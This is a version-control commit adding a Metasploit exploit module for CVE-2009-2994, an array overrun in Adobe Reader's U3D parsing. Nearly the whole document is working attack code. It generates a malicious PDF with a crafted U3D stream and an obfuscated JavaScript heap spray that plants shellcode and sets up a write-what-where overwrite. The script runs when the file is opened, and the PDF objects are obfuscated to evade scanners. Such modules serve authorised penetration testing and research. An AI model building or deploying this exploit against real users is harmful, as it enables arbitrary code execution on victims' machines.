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add exploit module for cve-2009-2994 

git-svn-id: file:///home/svn/framework3/trunk@7617 4d416f70-5f16-0410-b530-b9f4589650da
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Joshua Drake 2009-11-25 22:24:10 +00:00
parent 927563c135
commit f88dee904a
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modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb Normal file
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###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
'Description' => %q{
This module exploits an array overflow in Adobe Reader and Adobe Acrobat.
Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a
specially crafted pdf that a contains malformed U3D data, an attacker may
be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Felipe Andres Manzano <felipe.andres.manzano[at]gmail.com>',
'jduck'
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-2994' ],
[ 'OSVDB', '58912' ],
[ 'BID', '36689' ],
[ 'URL', 'http://sites.google.com/site/felipeandresmanzano/' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-15.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# test results (on Windows XP SP3)
# reader 7.0.5 - untested
# reader 7.0.8 - untested
# reader 7.0.9 - untested
# reader 7.1.0 - untested
# reader 7.1.1 - untested
# reader 8.0.0 - untested
# reader 8.1.2 - untested
# reader 8.1.3 - untested
# reader 9.0.0 - untested
# reader 9.1.0 - works
[ 'Adobe Reader Windows Universal (JS Heap Spray)',
{
'Size' => (6500/20),
'DataAddr' => 0x09011020,
'WriteAddr' => 0x7c49fb34,
}
],
],
'DisclosureDate' => 'Oct 13 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape(make_nops(4))
=begin
Original notes on heap technique used in this exploit:
## PREPAREHOLES:
## We will construct 6500*20 bytes long chunks starting like this
## |0 |6 |8 |C |24 |size
## |00000... |0100|20100190|0000... | ......pad...... |
## \ \
## \ \ -Pointer: to controlled data
## \ -Flag: must be 1
## -Adobe will handle this ragged structure if the Flag is on.
## -Adobe will get 'what to write where' from the memory pointed
## by our supplied Pointer.
##
## then allocate a bunch of those ..
## .. | chunk | chunk | chunk | chunck | chunk | chunck | chunck | ..
## |XXXXXXX|XXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXXX|
##
## and then free some of them...
## .. | chunk | free | chunk | free | chunk | free | chunck | ..
## |XXXXXXX| |XXXXXXX| |XXXXXXX| |XXXXXXXX|
##
## This way controlling when the next 6500*20 malloc will be
## followed with. We freed more than one hole so it became tolerant
## to some degree of malloc/free trace noise.
## Note the 6500 is arbitrary it should be a fairly unused chunk size
## not big enough to cause a different type of allocation.
## Also as we don't need to reference it from anywhere we don't care
## where this hole layout is placed in memory.
## PREPAREMEMORY:
## In the next technique we make a big-chunk of 0x10000 bytes
## repeating a 0x1000 bytes long mini-chunk of controled data.
## Big-chunks are always allocated aligned to 0x1000. And if we
## allocate a fair amount of big-chuncks (XPSPx) we'll be confident
## Any 0x1000 aligned 0x1000 bytes from 0x09000000 to 0x0a000000
## will have our mini chunk
##
## A mini-chunk will have this look
##
## |0 |10 |54 |? |0xff0 |0x1000
## |00000... | POINTERS | nops | shellcode | pad |
##
## So we control what is in 0x09XXXXXX. shellcode will be at 0x09XXX054+
## But we use 0x09011064.
## POINTERS looks like this:
## ...
=end
# prepare the hole
daddr = target['DataAddr']
hole_data = [0,0,1,daddr].pack('VvvV')
#padding
hole_data << "\x00" * 24
hole = Rex::Text.to_unescape(hole_data)
# prepare ptrs
ptrs_data = [0].pack('V')
#where to write
ptrs_data << [target['WriteAddr'] / 4].pack('V')
#must be greater tan 5 and less than x for getting us where we want
ptrs_data << [6].pack('V')
#what to write
ptrs_data << [(daddr+0x10)].pack('V')
#autopointer for print magic(tm)
ptrs_data << [(daddr+0x14)].pack('V')
#function pointers for print magic(tm)
#pointing to our shellcode
ptrs_data << [(daddr+0x44)].pack('V') * 12
ptrs = Rex::Text.to_unescape(ptrs_data)
js_doc = %Q|
function prepareHoles(slide_size)
{
var size = 1000;
var xarr = new Array(size);
var hole = unescape("#{hole}");
var pad = unescape("%u5858");
while (pad.length <= slide_size/2 - hole.length)
pad += pad;
for (loop1=0; loop1 < size; loop1+=1)
{
ident = ""+loop1;
xarr[loop1]=hole + pad.substring(0,slide_size/2-hole.length);
}
for (loop2=0;loop2<100;loop2++)
{
for (loop1=size/2; loop1 < size-2; loop1+=2)
{
xarr[loop1]=null;
xarr[loop1]=pad.substring(0,0x10000/2 )+"A";
xarr[loop1]=null;
}
}
return xarr;
}
function prepareMemory(size)
{
var mini_slide_size = 0x1000;
var slide_size = 0x100000;
var xarr = new Array(size);
var pad = unescape("%ucccc");
while (pad.length <= 32 )
pad += pad;
var nops = unescape("#{nops}");
while (nops.length <= mini_slide_size/2 - nops.length)
nops += nops;
var shellcode = unescape("#{shellcode}");
var pointers = unescape("#{ptrs}");
var chunk = nops.substring(0,32/2) + pointers +
nops.substring(0,mini_slide_size/2-pointers.length - shellcode.length - 32) +
shellcode + pad.substring(0,32/2);
chunk=chunk.substring(0,mini_slide_size/2);
while (chunk.length <= slide_size/2)
chunk += chunk;
for (loop1=0; loop1 < size; loop1+=1)
{
ident = ""+loop1;
xarr[loop1]=chunk.substring(16,slide_size/2 -32-ident.length)+ident;
}
return xarr;
}
var mem = prepareMemory(200);
var holes = prepareHoles(6500);
|
js_pg1 = %Q|this.print((bUI:true, bSilent:false, bShrinkToFit:false));|
# Obfuscate it up a bit
js_doc = obfuscate_js(js_doc,
'Symbols' => {
'Variables' => %W{ slide_size size hole pad mini_slide_size nops shellcode pointers chunk mem holes xarr loop1 loop2 ident },
'Methods' => %W{ prepareMemory prepareHoles }
}).to_s
# create the u3d stuff
u3d = make_u3d_stream(target['Size'])
# Create the pdf
pdf = make_pdf(u3d, js_doc, js_pg1)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def obfuscate_js(javascript, opts)
js = Rex::Exploitation::ObfuscateJS.new(javascript, opts)
js.obfuscate
return js
end
def RandomNonASCIIString(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def ioDef(id)
"%d 0 obj\n" % id
end
def ioRef(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def nObfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ASCIIHexWhitespaceEncode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_u3d_stream(size)
data = ""
data << "55334400180000000000000000010000000000002400000064010000000000006a00000014"
data << "ffffffe40000000000000007005468654d65736801000000000000005050500100000031ff"
data << "ffff710000004b00000007005468654d657368000000000000000001000000595858580400"
data << "0000000000000000000000000000010000000000000000000000000000005b5858585c5858"
data << "582c0100002c0100002c010000000000000000000000000000000000000000000000000000"
data << "000000000000000000000000505050010000000600617574686f7201000000370000004665"
data << "6c69706520416e64726573204d616e7a616e6f203c66656c6970652e616e647265732e6d61"
data << "6e7a616e6f40676d61696c2e636f6d3e503cffffff410000000000000007005468654d6573"
data << "68000000000000000000000000000000000100000001000000010000000100000001000000"
data << "0100000001000000010000000100000001000000505050"
data = [data].pack('H*')
# 9.6.1.1.3.3 U32: Position Count
addr = [0x58585859].pack('V')
data[data.index(addr),4] = [size].pack('V')
# minimalResolution
addr = [0x5858585b].pack('V')
data[data.index(addr),4] = [size+2].pack('V')
# finalMaximumResolution, this just need to be bigger than the last one.
addr = [0x5858585c].pack('V')
data[data.index(addr),4] = [size+3].pack('V')
return data
end
def make_pdf(u3d_stream, js_doc, js_pg1)
xref = []
eol = "\x0a"
obj_end = "" << eol << "endobj" << eol
# the header
pdf = "%PDF-1.7" << eol
# filename/comment
pdf << "%" << RandomNonASCIIString(4) << eol
# js stream
xref << pdf.length
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_doc))
pdf << ioDef(1) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << obj_end
# catalog
xref << pdf.length
pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4) << nObfu("/Pages ") << ioRef(5) << nObfu("/OpenAction ") << ioRef(9) << nObfu(">>")
pdf << obj_end
# outline
xref << pdf.length
pdf << ioDef(4) << nObfu("<</Type/Outlines/Count 0>>")
pdf << obj_end
# kids
xref << pdf.length
pdf << ioDef(5) << nObfu("<</Type/Pages/Count 2/Kids [")
pdf << ioRef(8) # u3d page
pdf << nObfu("]>>")
pdf << obj_end
# u3d stream
xref << pdf.length
pdf << ioDef(6) << nObfu("<</Type/3D/Subtype/U3D/Length %s>>" % u3d_stream.length) << eol
pdf << "stream" << eol
pdf << u3d_stream << eol
pdf << "endstream"
pdf << obj_end
# u3d annotation object
xref << pdf.length
pdf << ioDef(7) << nObfu("<</Type/Annot/Subtype")
pdf << "/3D/3DA <</A/PO/DIS/I>>"
pdf << nObfu("/Rect [0 0 640 480]/3DD ") << ioRef(6) << nObfu("/F 7>>")
pdf << obj_end
# page 0 (u3d/print)
xref << pdf.length
pdf << ioDef(8) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
pdf << nObfu("/Annots [") << ioRef(7) << nObfu("]")
pdf << nObfu("/AA << /O ") << ioRef(10) << nObfu(">>")
pdf << nObfu(">>")
pdf << obj_end
# js dict
xref << pdf.length
pdf << ioDef(9) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end
# js dict
xref << pdf.length
pdf << ioDef(10) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(11) + ">>" << obj_end
# js stream 2
xref << pdf.length
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_pg1))
pdf << ioDef(11) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << obj_end
# xrefs
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
# trailer
pdf << "trailer" << eol
pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(3) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end